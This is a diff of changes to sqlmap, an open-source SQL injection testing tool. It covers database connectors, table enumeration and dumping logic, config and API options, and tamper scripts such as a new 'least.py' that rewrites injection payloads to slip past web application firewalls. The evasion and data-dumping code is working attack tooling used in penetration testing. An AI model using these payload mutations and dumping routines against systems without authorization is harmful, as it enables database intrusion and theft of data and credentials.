result = inject.checkBooleanExpression("SQUARE([RANDNUM])=SQUARE([RANDNUM])")
|
||||
result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.MSSQL
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import pymysql
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
@@ -37,8 +37,10 @@ class Connector(GenericConnector):
|
||||
|
||||
try:
|
||||
self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
|
||||
except (pymysql.OperationalError, pymysql.InternalError, struct.error), msg:
|
||||
except (pymysql.OperationalError, pymysql.InternalError), msg:
|
||||
raise SqlmapConnectionException(msg[1])
|
||||
except struct.error, msg:
|
||||
raise SqlmapConnectionException(msg)
|
||||
|
||||
self.initCursor()
|
||||
self.printConnected()
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import cx_Oracle
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -67,7 +67,7 @@ class Enumeration(GenericEnumeration):
|
||||
user = None
|
||||
roles = set()
|
||||
|
||||
for count in xrange(0, len(value)):
|
||||
for count in xrange(0, len(value or [])):
|
||||
# The first column is always the username
|
||||
if count == 0:
|
||||
user = value[count]
|
||||
|
||||
@@ -10,7 +10,7 @@ try:
|
||||
import psycopg2.extensions
|
||||
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
|
||||
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
from lib.core.data import logger
|
||||
|
||||
@@ -7,7 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
|
||||
try:
|
||||
import sqlite3
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
try:
|
||||
import _mssql
|
||||
import pymssql
|
||||
except ImportError:
|
||||
except:
|
||||
pass
|
||||
|
||||
import logging
|
||||
|
||||
@@ -11,7 +11,6 @@ from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapFilePathException
|
||||
from lib.core.exception import SqlmapUndefinedMethod
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
||||
class Connector:
|
||||
"""
|
||||
@@ -23,8 +22,8 @@ class Connector:
|
||||
self.cursor = None
|
||||
|
||||
def initConnection(self):
|
||||
self.user = conf.dbmsUser.encode(UNICODE_ENCODING) if conf.dbmsUser is not None else ""
|
||||
self.password = conf.dbmsPass.encode(UNICODE_ENCODING) if conf.dbmsPass is not None else ""
|
||||
self.user = conf.dbmsUser or ""
|
||||
self.password = conf.dbmsPass or ""
|
||||
self.hostname = conf.hostname
|
||||
self.port = conf.port
|
||||
self.db = conf.dbmsDb
|
||||
|
||||
@@ -534,7 +534,7 @@ class Databases:
|
||||
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
|
||||
query = rootQuery.inband.query % tbl
|
||||
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl)
|
||||
|
||||
if dumpMode and colList:
|
||||
values = [(_,) for _ in colList]
|
||||
@@ -564,7 +564,7 @@ class Databases:
|
||||
index, values = 1, []
|
||||
|
||||
while True:
|
||||
query = rootQuery.inband.query2 % (conf.db, tbl, index)
|
||||
query = rootQuery.inband.query2 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index)
|
||||
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
||||
|
||||
if isNoneValue(value) or value == " ":
|
||||
@@ -663,15 +663,15 @@ class Databases:
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.count % (tbl)
|
||||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl)
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
|
||||
query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
||||
query += condQuery
|
||||
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
query = rootQuery.blind.query % tbl
|
||||
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl)
|
||||
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
parseSqliteTableSchema(value)
|
||||
return kb.data.cachedColumns
|
||||
@@ -694,7 +694,7 @@ class Databases:
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
count, index, values = 0, 1, []
|
||||
while True:
|
||||
query = rootQuery.blind.query3 % (conf.db, tbl, index)
|
||||
query = rootQuery.blind.query3 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index)
|
||||
value = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
if isNoneValue(value) or value == " ":
|
||||
break
|
||||
@@ -723,11 +723,11 @@ class Databases:
|
||||
query += condQuery.replace("[DB]", conf.db)
|
||||
field = condition.replace("[DB]", conf.db)
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query % (tbl)
|
||||
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl)
|
||||
query += condQuery
|
||||
field = None
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, tbl)
|
||||
query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
||||
query += condQuery
|
||||
field = condition
|
||||
|
||||
@@ -761,9 +761,9 @@ class Databases:
|
||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
|
||||
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
query = rootQuery.blind.query2 % (tbl, column)
|
||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column)
|
||||
elif Backend.isDbms(DBMS.INFORMIX):
|
||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, tbl, column)
|
||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column)
|
||||
|
||||
colType = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
|
||||
|
||||
@@ -170,18 +170,44 @@ class Entries:
|
||||
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
query = rootQuery.blind.count % table
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
entries = zip(*[entries[colName] for colName in colList])
|
||||
count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
if isNumPosStrValue(count):
|
||||
try:
|
||||
indexRange = getLimitRange(count, plusOne=True)
|
||||
|
||||
for index in indexRange:
|
||||
row = []
|
||||
for column in colList:
|
||||
query = rootQuery.blind.query3 % (column, column, table, index)
|
||||
query = agent.whereQuery(query)
|
||||
value = inject.getValue(query, blind=False, time=False, dump=True) or ""
|
||||
row.append(value)
|
||||
|
||||
entries.append(row)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not entries and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
entries = zip(*[entries[colName] for colName in colList])
|
||||
else:
|
||||
query = rootQuery.inband.query % (colString, conf.db, tbl)
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
|
||||
@@ -191,7 +217,7 @@ class Entries:
|
||||
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
if not entries and query:
|
||||
if not entries and query and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
entries = inject.getValue(query, blind=False, time=False, dump=True)
|
||||
except KeyboardInterrupt:
|
||||
@@ -285,17 +311,44 @@ class Entries:
|
||||
elif Backend.isDbms(DBMS.MAXDB):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
try:
|
||||
indexRange = getLimitRange(count, plusOne=True)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
for index in indexRange:
|
||||
for column in colList:
|
||||
query = rootQuery.blind.query3 % (column, column, table, index)
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
value = inject.getValue(query, union=False, error=False, dump=True) or ""
|
||||
|
||||
if column not in lengths:
|
||||
lengths[column] = 0
|
||||
|
||||
if column not in entries:
|
||||
entries[column] = BigArray()
|
||||
|
||||
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
|
||||
entries[column].append(value)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not entries and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, lengths = retVal
|
||||
|
||||
else:
|
||||
emptyColumns = []
|
||||
|
||||
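Both MSSQL branches above follow the same shape: fetch the row count, then retrieve every column of every row with an index-based query, and fall back to pivotDumpTable() only if that direct loop produced nothing and was not interrupted. Stripped of sqlmap's plumbing, the control flow is roughly the following (the `fetch_value` and `pivot_dump` callables and their return shapes are stand-ins, not sqlmap APIs):

```python
def dump_table(table, columns, count, fetch_value, pivot_dump):
    """Sketch of the per-index, per-column dumping loop with a pivot fallback."""
    entries = []
    interrupted = False

    try:
        for index in range(1, count + 1):           # rows are addressed 1..count
            row = []
            for column in columns:
                # stand-in for rootQuery.blind.query3 % (column, column, table, index)
                row.append(fetch_value(table, column, index) or "")
            entries.append(row)
    except KeyboardInterrupt:
        interrupted = True

    if not entries and not interrupted:
        # nothing came back the direct way: try the pivot-based dump instead
        pivoted = pivot_dump(table, columns)        # assumed to return ({column: [values]}, lengths) or None
        if pivoted:
            by_column, _ = pivoted
            entries = [list(row) for row in zip(*[by_column[column] for column in columns])]

    return entries

# tiny demonstration with fake callbacks
values = {("users", "name", 1): "admin", ("users", "surname", 1): "root"}
rows = dump_table("users", ["name", "surname"], 1,
                  fetch_value=lambda t, c, i: values.get((t, c, i)),
                  pivot_dump=lambda t, c: None)
print(rows)   # [['admin', 'root']]
```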
@@ -235,7 +235,7 @@ class Users:
|
||||
|
||||
if retVal:
|
||||
for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])):
|
||||
password = "0x%s" % hexencode(password).upper()
|
||||
password = "0x%s" % hexencode(password, conf.encoding).upper()
|
||||
|
||||
if user not in kb.data.cachedUsersPasswords:
|
||||
kb.data.cachedUsersPasswords[user] = [password]
|
||||
@@ -393,7 +393,7 @@ class Users:
|
||||
user = None
|
||||
privileges = set()
|
||||
|
||||
for count in xrange(0, len(value)):
|
||||
for count in xrange(0, len(value or [])):
|
||||
# The first column is always the username
|
||||
if count == 0:
|
||||
user = value[count]
|
||||
@@ -424,7 +424,8 @@ class Users:
|
||||
|
||||
# In Firebird we get one letter for each privilege
|
||||
elif Backend.isDbms(DBMS.FIREBIRD):
|
||||
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
|
||||
if privilege.strip() in FIREBIRD_PRIVS:
|
||||
privileges.add(FIREBIRD_PRIVS[privilege.strip()])
|
||||
|
||||
# In DB2 we get Y or G if the privilege is
|
||||
# True, N otherwise
|
||||
|
||||
13
sqlmap.conf
@@ -98,9 +98,9 @@ authCred =
|
||||
# Syntax: key_file
|
||||
authFile =
|
||||
|
||||
# Ignore HTTP Error 401 (Unauthorized).
|
||||
# Valid: True or False
|
||||
ignore401 = False
|
||||
# Ignore HTTP error code (e.g. 401).
|
||||
# Valid: integer
|
||||
ignoreCode =
|
||||
|
||||
# Ignore system default proxy settings.
|
||||
# Valid: True or False
|
||||
@@ -671,8 +671,8 @@ batch = False
|
||||
# Result fields having binary values (e.g. "digest").
|
||||
binaryFields =
|
||||
|
||||
# Force character encoding used for data retrieval.
|
||||
charset =
|
||||
# Check Internet connection before assessing the target.
|
||||
checkInternet = False
|
||||
|
||||
# Crawl the website starting from the target URL.
|
||||
# Valid: integer
|
||||
@@ -690,6 +690,9 @@ csvDel = ,
|
||||
# Valid: CSV, HTML or SQLITE
|
||||
dumpFormat = CSV
|
||||
|
||||
# Force character encoding used for data retrieval.
|
||||
encoding =
|
||||
|
||||
# Retrieve each query output length and calculate the estimated time of
|
||||
# arrival in real time.
|
||||
# Valid: True or False
|
||||
|
||||
23
sqlmap.py
@@ -9,12 +9,16 @@ import sys
 
 sys.dont_write_bytecode = True
 
-__import__("lib.utils.versioncheck") # this has to be the first non-standard import
+try:
+    __import__("lib.utils.versioncheck") # this has to be the first non-standard import
+except ImportError:
+    exit("[!] wrong installation detected (missing modules). Visit 'https://github.com/sqlmapproject/sqlmap/#installation' for further details")
 
 import bdb
 import distutils
 import glob
 import inspect
+import json
 import logging
 import os
 import re
@@ -40,6 +44,7 @@ try:
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import maskSensitiveData
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.common import weAreFrozen
|
||||
from lib.core.data import cmdLineOptions
|
||||
@@ -214,7 +219,7 @@ def main():
|
||||
dataToStdout(excMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "tamper/" in excMsg:
|
||||
elif any(_ in excMsg for _ in ("tamper/", "waf/")):
|
||||
logger.critical(errMsg)
|
||||
print
|
||||
dataToStdout(excMsg)
|
||||
@@ -260,6 +265,13 @@ def main():
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")):
|
||||
errMsg = "there has been a problem in enumeration. "
|
||||
errMsg += "Because of a considerable chance of false-positive case "
|
||||
errMsg += "you are advised to rerun with switch '--flush-session'"
|
||||
logger.error(errMsg)
|
||||
raise SystemExit
|
||||
|
||||
elif all(_ in excMsg for _ in ("pymysql", "configparser")):
|
||||
errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)"
|
||||
logger.error(errMsg)
|
||||
@@ -275,6 +287,9 @@ def main():
|
||||
elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"):
|
||||
raise SystemExit
|
||||
|
||||
elif any(_ in excMsg for _ in ("Broken pipe",)):
|
||||
raise SystemExit
|
||||
|
||||
for match in re.finditer(r'File "(.+?)", line', excMsg):
|
||||
file_ = match.group(1)
|
||||
file_ = os.path.relpath(file_, os.path.dirname(__file__))
|
||||
@@ -320,6 +335,10 @@ def main():
|
||||
except KeyboardInterrupt:
|
||||
pass
|
||||
|
||||
if conf.get("harFile"):
|
||||
with openFile(conf.harFile, "w+b") as f:
|
||||
json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))
|
||||
|
||||
if cmdLineOptions.get("sqlmapShell"):
|
||||
cmdLineOptions.clear()
|
||||
conf.clear()
|
||||
|
||||
15
sqlmapapi.py
@@ -5,14 +5,19 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import logging
|
||||
import optparse
|
||||
import sys
|
||||
|
||||
sys.dont_write_bytecode = True
|
||||
|
||||
__import__("lib.utils.versioncheck") # this has to be the first non-standard import
|
||||
|
||||
import logging
|
||||
import optparse
|
||||
import warnings
|
||||
|
||||
warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
|
||||
warnings.filterwarnings(action="ignore", category=DeprecationWarning)
|
||||
|
||||
from sqlmap import modulePath
|
||||
from lib.core.common import setPaths
|
||||
from lib.core.data import logger
|
||||
@@ -40,13 +45,15 @@ def main():
|
||||
apiparser.add_option("-H", "--host", help="Host of the REST-JSON API server (default \"%s\")" % RESTAPI_DEFAULT_ADDRESS, default=RESTAPI_DEFAULT_ADDRESS, action="store")
|
||||
apiparser.add_option("-p", "--port", help="Port of the the REST-JSON API server (default %d)" % RESTAPI_DEFAULT_PORT, default=RESTAPI_DEFAULT_PORT, type="int", action="store")
|
||||
apiparser.add_option("--adapter", help="Server (bottle) adapter to use (default \"%s\")" % RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER, action="store")
|
||||
apiparser.add_option("--username", help="Basic authentication username (optional)", action="store")
|
||||
apiparser.add_option("--password", help="Basic authentication password (optional)", action="store")
|
||||
(args, _) = apiparser.parse_args()
|
||||
|
||||
# Start the client or the server
|
||||
if args.server is True:
|
||||
server(args.host, args.port, adapter=args.adapter)
|
||||
server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password)
|
||||
elif args.client is True:
|
||||
client(args.host, args.port)
|
||||
client(args.host, args.port, username=args.username, password=args.password)
|
||||
else:
|
||||
apiparser.print_help()
|
||||
|
||||
|
||||
@@ -36,10 +36,10 @@ def tamper(payload, **kwargs):
     retVal = payload
 
     if payload:
-        match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload)
+        match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
 
         if match:
-            _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4))
+            _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
             retVal = retVal.replace(match.group(0), _)
 
     return retVal
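The rewritten pattern drops the negative look-ahead and captures the right-hand operand as either a bare word or a quoted string, so the GREATEST rewrite now uses groups 3 and 4. A quick standalone check of what the new expression produces (regex copied from the hunk; the payload is a made-up sample):

```python
import re

payload = "1 AND A > B"   # made-up sample payload

match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
if match:
    replacement = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
    payload = payload.replace(match.group(0), replacement)

print(payload)   # 1 AND GREATEST(A,B+1)=A
```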
45
tamper/least.py
Normal file
@@ -0,0 +1,45 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.HIGHEST
|
||||
|
||||
def dependencies():
|
||||
pass
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Replaces greater than operator ('>') with 'LEAST' counterpart
|
||||
|
||||
Tested against:
|
||||
* MySQL 4, 5.0 and 5.5
|
||||
* Oracle 10g
|
||||
* PostgreSQL 8.3, 8.4, 9.0
|
||||
|
||||
Notes:
|
||||
* Useful to bypass weak and bespoke web application firewalls that
|
||||
filter the greater than character
|
||||
* The LEAST clause is a widespread SQL command. Hence, this
|
||||
tamper script should work against majority of databases
|
||||
|
||||
>>> tamper('1 AND A > B')
|
||||
'1 AND LEAST(A,B+1)=B+1'
|
||||
"""
|
||||
|
||||
retVal = payload
|
||||
|
||||
if payload:
|
||||
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
|
||||
|
||||
if match:
|
||||
_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
|
||||
retVal = retVal.replace(match.group(0), _)
|
||||
|
||||
return retVal
|
||||
@@ -33,7 +33,7 @@ def tamper(payload, **kwargs):
 
     >>> random.seed(0)
     >>> tamper('SELECT id FROM users')
-    'SELECT%0Bid%0DFROM%0Cusers'
+    'SELECT%A0id%0BFROM%0Cusers'
     """
 
     # ASCII table:
@@ -42,7 +42,8 @@ def tamper(payload, **kwargs):
     # FF 0C new page
     # CR 0D carriage return
     # VT 0B vertical TAB (MySQL and Microsoft SQL Server only)
-    blanks = ('%09', '%0A', '%0C', '%0D', '%0B')
+    # A0 non-breaking space
+    blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0')
     retVal = payload
 
     if payload:
127
txt/checksum.md5
@@ -21,35 +21,35 @@ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.
|
||||
310efc965c862cfbd7b0da5150a5ad36 extra/sqlharvest/__init__.py
|
||||
7713aa366c983cdf1f3dbaa7383ea9e1 extra/sqlharvest/sqlharvest.py
|
||||
7afe836fd97271ccba67b4c0da2482ff lib/controller/action.py
|
||||
95fda7f284e0a882634cf5e94cbb73e1 lib/controller/checks.py
|
||||
df647d57cf02cc0e4bda6b8ccc9d8138 lib/controller/controller.py
|
||||
52a3969f57170e935e3fc0156335bf2c lib/controller/handler.py
|
||||
b220153f82deefa5d5f513f1ebf2346b lib/controller/checks.py
|
||||
a66093c734c7f94ecdf94d882c2d8b89 lib/controller/controller.py
|
||||
926bdaf98d082a41fdd57bb41c1692d1 lib/controller/handler.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/controller/__init__.py
|
||||
60599fbb43b7d5e658b84371d3ad0b42 lib/core/agent.py
|
||||
90b4f40ccde13c44e26f53db474afc19 lib/core/agent.py
|
||||
6cc95a117fbd34ef31b9aa25520f0e31 lib/core/bigarray.py
|
||||
6c8507976da31524e7afa3886d13bf4f lib/core/common.py
|
||||
5065a4242a8cccf72f91e22e1007ae63 lib/core/convert.py
|
||||
ff068a628d68a4dcf597ae60e6e8abe2 lib/core/common.py
|
||||
9edefb92b0b9cad862543fcd587aaa66 lib/core/convert.py
|
||||
a8143dab9d3a27490f7d49b6b29ea530 lib/core/data.py
|
||||
7936d78b1a7f1f008ff92bf2f88574ba lib/core/datatype.py
|
||||
36c85e9ef109c5b4af3ca9bb1065ef1f lib/core/decorators.py
|
||||
94b06df2dfd9f6c7a2ad3f04a846b686 lib/core/defaults.py
|
||||
7309cf449b009723d1a4655fcf1a96d7 lib/core/dicts.py
|
||||
fa0cc2588d9e3fe215d4519879a0678f lib/core/dicts.py
|
||||
65b9187de3d8c9c28ddab53ef2b399bc lib/core/dump.py
|
||||
b9ff4e622c416116bee6024c0f050349 lib/core/enums.py
|
||||
9381a0c7e8bc19986299e84f4edda1a0 lib/core/exception.py
|
||||
4e7538d2700947749e0ef93819f4b13b lib/core/enums.py
|
||||
a44d7a4cc6c9a67a72d6af2f25f4ddac lib/core/exception.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/core/__init__.py
|
||||
9ba39bf66e9ecd469446bdbbeda906c3 lib/core/log.py
|
||||
ebb778c2d26eba8b34d7d8658e4105a6 lib/core/optiondict.py
|
||||
97231fc3987ffce83f59a7aa545ef4c9 lib/core/option.py
|
||||
e8e9fd4f224ead0caa1569312b5b2582 lib/core/optiondict.py
|
||||
1b22c491f07c838eb470624ee4320d12 lib/core/option.py
|
||||
5f2f56e6c5f274408df61943f1e080c0 lib/core/profiling.py
|
||||
40be71cd774662a7b420caeb7051e7d5 lib/core/readlineng.py
|
||||
d8e9250f3775119df07e9070eddccd16 lib/core/replication.py
|
||||
785f86e3f963fa3798f84286a4e83ff2 lib/core/revision.py
|
||||
40c80b28b3a5819b737a5a17d4565ae9 lib/core/session.py
|
||||
6a82bb3548afc52b7cecfcc81273c52e lib/core/settings.py
|
||||
d5d19c38c07e9ef926caa778b75571d6 lib/core/settings.py
|
||||
d91291997d2bd2f6028aaf371bf1d3b6 lib/core/shell.py
|
||||
2ad85c130cc5f2b3701ea85c2f6bbf20 lib/core/subprocessng.py
|
||||
155e2d3fda87b2e3ffa4f7a770513946 lib/core/target.py
|
||||
effc153067a00bd43461bfc1cdec1122 lib/core/target.py
|
||||
8970b88627902239d695280b1160e16c lib/core/testing.py
|
||||
40881e63d516d8304fc19971049cded0 lib/core/threads.py
|
||||
ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
@@ -57,52 +57,53 @@ ad74fc58fc7214802fd27067bce18dd2 lib/core/unescaper.py
|
||||
4d13ed693401a498b6d073a2a494bd83 lib/core/wordlist.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/__init__.py
|
||||
8c4b04062db2245d9e190b413985202a lib/parse/banner.py
|
||||
aa89ea0c7c44eb74eaaeeccaddc94d39 lib/parse/cmdline.py
|
||||
850041c049ae5a8f4a318680e1ef812d lib/parse/cmdline.py
|
||||
3a31657bc38f277d0016ff6d50bde61f lib/parse/configfile.py
|
||||
14539f1be714d4f1ed042067d63bc50a lib/parse/handler.py
|
||||
64e5bb3ecbdd75144500588b437ba8da lib/parse/headers.py
|
||||
8da3684e70bfeef80b1d221ff0cd958c lib/parse/headers.py
|
||||
165dc27660c8559318009d44354f27cb lib/parse/html.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/parse/__init__.py
|
||||
0b010b7cdb2e42b5aa0caa59607279ad lib/parse/payloads.py
|
||||
997d0452e6fc22411f81a334511bcb3d lib/parse/sitemap.py
|
||||
403d873f1d2fd0c7f73d83f104e41850 lib/request/basicauthhandler.py
|
||||
aa8abda6eab79646b1759c0653925328 lib/request/basic.py
|
||||
0c476bde96ad035b3f0dde3b845e5e6e lib/request/basic.py
|
||||
ef48de622b0a6b4a71df64b0d2785ef8 lib/request/comparison.py
|
||||
95363c8973208dd95295a23acc9674bc lib/request/connect.py
|
||||
1ec370ec9d037135607b48ad6afd4f40 lib/request/connect.py
|
||||
fb6b788d0016ab4ec5e5f661f0f702ad lib/request/direct.py
|
||||
cc1163d38e9b7ee5db2adac6784c02bb lib/request/dns.py
|
||||
5dcdb37823a0b5eff65cd1018bcf09e4 lib/request/httpshandler.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/request/__init__.py
|
||||
70ec3f5bce37cdd7bf085ba2ddda30ac lib/request/inject.py
|
||||
f7660e11e23e977b00922e241b1a3000 lib/request/inject.py
|
||||
dc1e0af84ee8eb421797d61c8cb8f172 lib/request/methodrequest.py
|
||||
bb9c165b050f7696b089b96b5947fac3 lib/request/pkihandler.py
|
||||
602d4338a9fceaaee40c601410d8ac0b lib/request/rangehandler.py
|
||||
111b3ee936f23167b5654a5f72e9731b lib/request/redirecthandler.py
|
||||
20a0e6dac2edcf98fa8c47ee9a332c28 lib/request/templates.py
|
||||
992a02767d12254784f15501a7ab8dd8 lib/takeover/abstraction.py
|
||||
021a3bf20bcea047ab5601e8af736fee lib/request/redirecthandler.py
|
||||
b373770137dc885889e495de95169b93 lib/request/templates.py
|
||||
3790c378a58ec7635d7d83efef5c1032 lib/takeover/abstraction.py
|
||||
c6bc7961a186baabe0a9f5b7e0d8974b lib/takeover/icmpsh.py
|
||||
310efc965c862cfbd7b0da5150a5ad36 lib/takeover/__init__.py
|
||||
c90c993b020a6ae0f0e497fd84f37466 lib/takeover/metasploit.py
|
||||
ac541a0d38e4ecb4e41e97799a7235f4 lib/takeover/registry.py
|
||||
d466eab3ff82dbe29dc820e303eb4cff lib/takeover/udf.py
|
||||
e7f3012f4f9e822d39eabd934d050b0e lib/takeover/web.py
|
||||
